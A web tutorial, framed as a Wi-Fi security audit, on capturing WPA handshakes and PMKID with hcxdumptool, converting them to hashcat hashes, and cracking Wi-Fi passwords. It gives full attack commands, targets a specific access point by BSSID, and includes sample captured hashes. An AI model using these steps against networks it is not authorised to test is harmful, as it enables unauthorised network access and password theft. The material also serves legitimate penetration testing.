Wi-Fi security audit with Hashcat and hcxdumptool
Table of contents
1. New Wi-Fi security audit guide
2. Up-to-date Wi-Fi security audit tools
3. Command summary for Wi-Fi security audit
4. Stop processes that might interfere with handshake and PMKID capturing
5. Manage with wireless network interfaces
6. Handshakes and PMKID capture
7. Convert captured data to hash
See the first part here: Wi-Fi security audit improved: new tools, hash, and techniques
New Wi-Fi security audit guide
4-Way Handshake and PMKID capturing (see “Hacking Wi-Fi without users”) remain the most versatile methods to hack the Wi-Fi password, working for all Access Points. Although for some Access Points there are faster methods that exploit vulnerabilities or use the accumulated database of vulnerable routers (“How to hack Wi-Fi”).
Let's consider a modern attack on capturing handshakes and PMKID (using the hcxdumptool tool), converting it to a new hash format (using hcxpcapngtool) and cracking it at maximum graphical card speeds (using Hashcat).
Up-to-date Wi-Fi security audit tools
This guide uses the following tools:
- hcxdumptool
- hcxtools (toolbox). Namely, hcxpcapngtool and hcxhashtool tools from this set
- hashcat
If any of these programs are not installed on your system, then follow the links above to install the tools on your distribution.
Command summary for Wi-Fi security audit
Here are the most important commands – in case you do not have time to read the article in full.
Network interface names:
hcxdumptool -I
A typical command for capturing data:
hcxdumptool -i INTERFACE -o ФАЙЛ.pcapng --active_beacon --enable_status=15
Captured wireless frames are saved to dumpfile.pcapng file. Convert this file to hashes:
hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng
A hash.hc22000 file with hashes will be created.
To view information about hashes, use the hcxhashtool utility:
hcxhashtool --info=stdout -i hash.hc22000
Dictionary attack:
hashcat -m 22000 -a 0 hash.hc22000 СЛОВАРЬ.txt
Mask attack example:
hashcat -m 22000 -a 3 hash.hc22000 ?d?d?d?d?d?d?d?d
Stop processes that might interfere with handshake and PMKID capturing
Wi-Fi network security audit can be divided into:
- Online attack when the data necessary to decrypt the wireless network password is captured. During this period, you need to be close to the attacked Access Point, while it must be turned on. That is, as if “online”
- and Offline attack when a password is brute-forced. At this time, you can be anywhere, and the Access Point can even be turned off – this will not affect the result of the attack
During the online stage, it is strongly recommended to stop services that may interfere with the operation of network interfaces:
sudo systemctl stop NetworkManager sudo systemctl stop wpa_supplicant
After the capturing of handshakes and PMKID is complete, you can start NetworkManager again (wpa_supplicant will be started automatically):
sudo systemctl start NetworkManager
Manage wireless network interfaces
The hcxdumptool utility is a versatile utility for viewing the status and managing network interfaces, and for performing wireless attacks.
To display a list of wireless interfaces, use the command:
hcxdumptool -I
Sample output (yes, I have a collection of adapters based on various chipsets: Realtek, Atheros, Intel and Mediatek):
wlan interfaces: c0b6f9daaf3e wlo1 (iwlwifi) 00c0ca96cfcb wlp0s20f0u2 (ath9k_htc) warning:spoofed MAC e20def45c3f8 detected 00c0ca900d9f wlp0s20f0u1 (rt2800usb) warning:spoofed MAC e2b48830044d detected 00c0cab026eb wlp0s20f0u5 (mt76x2u) warning:spoofed MAC 72fe786e01f0 detected
You can get the same result with the command:
iw dev
With the command like
sudo hcxdumptool -i INTERFACE -C
you can view the channels supported by the wireless adapter.
For instance:
sudo hcxdumptool -i wlp0s20f0u1 -C
You can display similar information with the command
iw list
The --check_driver option runs several tests to ensure that the driver supports all the necessary ioctl() system calls. The driver must support monitor mode and full package injection, otherwise hcxdumptool will not work properly:
sudo hcxdumptool -i INTERFACE --check_driver
For instance:
sudo hcxdumptool -i wlp0s20f0u1 --check_driver
The key lines in the output are:
driver tests passed... all required ioctl() system calls are supported by driver
They mean that this wireless adapter is fully suitable for performing wireless attacks.
With the --check_injection option, you can run an antenna test and a wireless packet injection test to determine if the driver supports full packet injection.
The results of this test are unstable, because they depend on a number of factors: proximity to Access Points and signal quality, which, in turn, can change from certain interference.
Another way to check if packet injection is working to start the tool with the --do_rcascan option, the program will list Access Points within range and INJECTION-RATIO. To obtain results, it is recommended to run the program for at least 13 * 5 seconds (13 channels, by default, the listening time for each channel is 5 seconds):
sudo hcxdumptool -i INTERFACE --do_rcascan
For instance:
sudo hcxdumptool -i wlp0s20f0u1 --do_rcascan
Pay attention to the table header:
BSSID FREQ CH RSSI BEACON RESPONSE ESSID SCAN-FREQ: 2432 INJECTION-RATIO: 30% [18:59:25]
It has the value INJECTION-RATIO.
If the AP is within your reach, then you can proceed with the attack.
If using ioctl() for some reason is not possible with your wireless adapter, then you can put it into monitor mode in the usual way (the hcxdumptool author recommends this only as a last resort):
sudo ip link set <INTERFACE> down sudo iw <INTERFACE> set monitor control sudo ip link set <INTERFACE> up
Handshakes and PMKID capture
Attack all APs
A typical command for capturing data:
hcxdumptool -i INTERFACE -o FILE.pcapng --active_beacon --enable_status=15
In this command, FILE.pcapng is the file where the captured wireless frames will be saved.
Example of my command:
sudo hcxdumptool -i wlp0s20f0u2 -o dumpfile.pcapng --active_beacon --enable_status=15
The default channel switching time is 5 seconds. This is more suitable if you are on the move, that is, for mobile attacks. If you are located permanently and are not in a hurry, then the operating time on each channel can be increased, for example, up to two minutes (option -t SECONDS):
sudo hcxdumptool -i wlp0s20f0u2 -o dumpfile.pcapng --active_beacon --enable_status=15 -t 120
If you do not want your wireless adapter to emit any frames, then specify the --silent option. This will disable the Deauthentication attack, an attack on clients without an AP, but will make you invisible (for wireless activity monitoring devices).
By default, hcxdumptool automatically selects the channels on which it listens and captures data. With the -c NUMBER option you can choose to set the frequency (2437,2462,5600,…) or the channel (1,2,3,…). Default: auto frequency/auto range. Maximum number of entries: 255. Values between 0-1000 are treated as channels and values >1000 are treated as frequency in MHz
On 5GHz and 6GHz it is recommended to use the frequency instead of the channel numbers since the channel numbers are not unique here. Standard 802.11 channels (device, driver and world regulatory domain dependent): https://en.wikipedia.org/wiki/List_of_WLAN_channels
With the -s NUMBER option you can set a predefined scan list, the following lists are available:
- 0 = auto frequency/auto band (default)
- 1 = 1,6,11,3,5,1,6,11,2,4,1,6,11,7,9,1,6,11,8,10,1,6,11,12,13 (optimized 2.4GHz)
- 2 = 1,2,3,4,5,6,7,8,9,10,11,12,13 (standard 2.4 GHz)
- 3 = 36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,144,149,153,157,161,165 (standard 5GHz)
- 4 = 1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,144,149,153,157,161,165 (standard 2.4GHz/5GHz)
If you want to save the coordinates of the wireless Access Points / track your movement, then use the options:
--use_gps_device=DEVICE
- use a GPS device such as /dev/ttyACM0, /dev/ttyUSB0, … (NMEA 0183 standard, fields $GPGGA $GPGGA)
--use_gpsd
use GPSD device (NMEA 0183 standard, $GPGGA $GPGGA fields)
--nmea=FILE
save track to file. Format: NMEA 0183 $GPGGA, $GPRMC, $GPWPL
See also: How to use Android phone as GPS sensor in Linux
An example of a program work log:
You can find an explanation of the terms in the “Abbreviations” section on the program page: https://en.kali.tools/?p=841.
Attack a specific AP
To attack a specific Access Point, assuming that you know its name (ESSID), you need to know the channel on which it operates and its MAC address (BSSID). This information can be collected by running hcxdumptool with the --do_rcascan option:
sudo hcxdumptool -i wlp0s20f0u2 --do_rcascan
Let's say I'm interested in an access point with the network name RT-728005:
BSSID FREQ CH RSSI BEACON RESPONSE ESSID SCAN-FREQ: 2422 INJECTION-RATIO: 27% [12:51:31] ----------------------------------------------------------------------------------------------------- … … c891f9c7eff6 2412 1 113 47 34 RT-728005 … …
You need to add options to the hcxdumptool command:
- --filtermode=CHANNEL
- --filterlist_ap=MAC_OR_FILE_WITH_MAC
For example, the RT-728005 AP that interests me works on the first channel and has BSSID c891f9c7eff6, then the command is as follows:
sudo hcxdumptool -i wlp0s20f0u2 -o RT-728005.pcapng --active_beacon --enable_status=15 --filtermode=2 --filterlist_ap=c891f9c7eff6 -c 1
Captured wireless frames are saved to file RT-728005.pcapng. Convert this file to hash:
hcxpcapngtool -o RT-728005.hc22000 -E wordlist RT-728005.pcapng
Viewing hash information:
hcxhashtool --info=stdout -i RT-728005.hc22000
This ends the online stage. Now you can start Network Manager again:
sudo systemctl start NetworkManager
Convert captured data to hash
To convert capture to the hash, use the following command:
hcxpcapngtool -o HASH.hc22000 -E WORDLIST CAPTURE_FILE.pcapng
In this command:
- HASH.hc22000 is a file where all converted hashes will be placed
- WORDLIST is a list of strings, including the names of the APs seen (ESSID), as well as strings transmitted in cleartext – sometimes you can see the Wi-Fi password here, some especially poorly designed devices can transmit it in plaintext
- CAPTURE_FILE.pcapng is a file with wireless frames that we captured in the previous step
Command example:
hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng
The hash.hc22000 file will be created with hashes and statics of the captured data will be displayed:
Hashes example:
WPA*02*cf8d06ec4aeba37f5288e65ad802f5d3*10ae604c41e6*d4124342bd39*54502d4c696e6b5f303132365f455854*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c8d7a67dcf998fcc7e71de2b8fc076845c7fce4b04c7f1a52a67f03c2970bfc34000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*10 WPA*02*db391bf2742b8f862aa0656f4a3ab063*10ae604c41e7*b4fbe33717a0*616b3834*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c54c7c5c35fead373561cc26664649e6f6d3664765abdba3e1396442e3dbf7043000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*10 WPA*02*3d40af734bfaaaeb4649e0eab240a39e*10ae604c41e8*ee48b8e81589*54502d4c696e6b5f303132365f3547*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c93bb8236f147d14d1f562b4f59cf7b050dc4b76f6faa5fdd0aa9cc233b6b06b5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*10 WPA*02*efb03520bbd51818ff1bedd948633d0d*1c3bf3110126*28565a0ce1b1*54502d4c696e6b5f30313236*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c684d1db707cb77070f2f82f2e7dcc3d13588651a03283cd42e5ceab8dcc4ab57000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10 WPA*02*4dd975abac76732237967a7751880a27*52ff20513c4c*b4fbe33717a0*616b3834*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53cab25d6ef96c3a0295c2849e02799b777f6aa88a0169d645547f4c72862d7092b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10 WPA*02*f8021dd2fbac283ed9abbae33d507636*68ff7b2b33d0*420a96ef1527*54502d4c696e6b5f333343455f3547*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0203007502010a0010000000000000f53ceeaa8e20f3d31a31ed31b99431c72fff3b8a8b4568bdf09bc68b952742a484c9000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020c00*10 WPA*02*87ca0740cc9115d80092b4481ccd0f7f*68ff7b2b33d0*5e02e859bc68*54502d4c696e6b5f333343455f3547*71159d9a8e714aabb36f449f603bcc3a5b1d754c5ee756b314e4ee8e475e31fa*0103007502010a001000000000000000010335e9a1c1859746102aa540f063c6d2843ac8b6334b23aab61a1441564d4448000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020c00*02 WPA*02*2b25289c5d103de4455c605185f16799*68ff7b2b33d0*6e4138786697*54502d4c696e6b5f333343455f3547*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c0a63db353cb974e01b619ccb5a2505ed25df29630f9dab7ff09a6e7579095024000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac02ac24*10 WPA*01*472dca0f8d8fddc252c3eb15f8fe77ab*8c10d4c712b6*b0febd84cfaa*526f7374656c65636f6d5f433731324236*** WPA*01*784d7491048ba9d3fa68f64e294453cf*b09575bddc88*b0febd84cfaa*54502d4c696e6b5f444338365f3547*** WPA*01*b07fec80cc50c50aeddf66d599d24f2b*cc32e5b688f2*b0febd84cfaa*54502d4c696e6b5f383846305f3547*** WPA*01*8037d5a102f36040899b8c66f440c44b*e8018d3f4418*b0febd84cfaa*66685f336634343138*** WPA*02*2c68c0106fca98afb4ced71b9fc9d9c9*e848b8e81588*d4124342bd39*54502d4c696e6b5f303132365f455854*a736810c5a6dffb7317c1c88ca16afe6572762f186674e71879bcbb0c53e820b*0103007502010a00000000000000000001fbf958785389e5a6d68fd7446e2a0f4a858632bf4d103b73b66d6cc459622c0b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*02
The hash structure is as follows:
PROTOCOL*TYPE*PMKID/MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR
Where:
- PROTOCOL = Fixed string "WPA"
- TYPE = 01 for PMKID, 02 for EAPOL
- PMKID/MIC = PMKID if TYPE=01, MIC if TYPE=02
- MACAP = MAC of AP
- MACCLIENT = MAC of CLIENT
- ESSID = network name (ESSID) in HEX
- ANONCE = ANONCE
- EAPOL = EAPOL (SNONCE is in here)
- MESSAGEPAIR = Bitmask:
- 0: MP info (https://hashcat.net/wiki/doku.php?id=hccapx)
- 1: MP info (https://hashcat.net/wiki/doku.php?id=hccapx)
- 2: MP info (https://hashcat.net/wiki/doku.php?id=hccapx)
- 3: x (unused)
- 4: ap-less attack (set to 1) - no nonce-error-corrections necessary
- 5: LE router detected (set to 1) - nonce-error-corrections only for LE necessary
- 6: BE router detected (set to 1) - nonce-error-corrections only for BE necessary
- 7: not replaycount checked (set to 1) - replaycount not checked, nonce-error-corrections definitely necessary
To view information about hashes, use the hcxhashtool utility:
hcxhashtool --info=stdout -i FILE.HASH
For instance:
hcxhashtool --info=stdout -i hash.hc22000
A list of hashes and their characteristics will be displayed.
hcxhashtool has a number of filters, the most useful of which are:
--essid=<ESSID> : filter by ESSID --essid-part=<part of ESSID> : filter by part of ESSID --essid-list=<file> : filter by ESSID file --mac-skiplist=<file> : exclude MAC from file format: 001122334455, 00:11:22:33:44:55, 00-11-22-33-44-55 (hex)
For example, the following command will display information only about the AP named TP-Link_0126
hcxhashtool --info=stdout -i hash.hc22000 --essid=TP-Link_0126
If you want to extract a single hash, or exclude certain hashes, then use the filter (given above or from the full list https://en.kali.tools/?p=847#hcxhashtool of options), as well as the -o option, after which specify the file, in which the selected hashes should be stored:
hcxhashtool -i hash.hc22000 --essid=ak84 -o ak84.hc22000
If you want only one hash for each Access Point, then use the following construction:
cat hash.hc22000 | sort -t "*" -k 6,6 -u > hash.hc22000.uniq hcxhashtool --info=stdout -i hash.hc22000.uniq
Password cracking
An example of launching a dictionary attack, hashes are stored in the hash.hc22000 file.
Downloading the dictionary:
wget https://wpa-sec.stanev.org/dict/cracked.txt.gz
Run brute force:
hashcat -m 22000 -a 0 hash.hc22000 cracked.txt.gz
Mask attack example:
hashcat -m 22000 -a 3 hash.hc22000 ?d?d?d?d?d?d?d?d
Options that might come in handy:
- --hwmon-temp-abort=100
- -d 1
Examples of my real commands:
hashcat --hwmon-temp-abort=100 -a 0 -m 22000 -d 1 RT-728005.hash rockyou_cleaned.txt hashcat --hwmon-temp-abort=100 -a 3 -m 22000 -d 1 RT-728005.hash ?d?d?d?d?d?d?d?d
Related articles:
- Wi-Fi security audit improved: new tools, hash, and techniques (95.7%)
- Hacking Wi-Fi without users (68.6%)
- Hacking Wi-Fi without users in Aircrack-ng (67.1%)
- How to use precomputed tables to crack Wi-Fi passwords in Hashcat and John the Ripper (63.2%)
- Hacking Wi-Fi without clients on Windows (using Wireshark and Npcap to capture PMKID) (62.8%)
- USB Wi-Fi Adapters with monitor mode and wireless injection (100% compatible with Kali Linux) 2022 (RANDOM - 50.6%)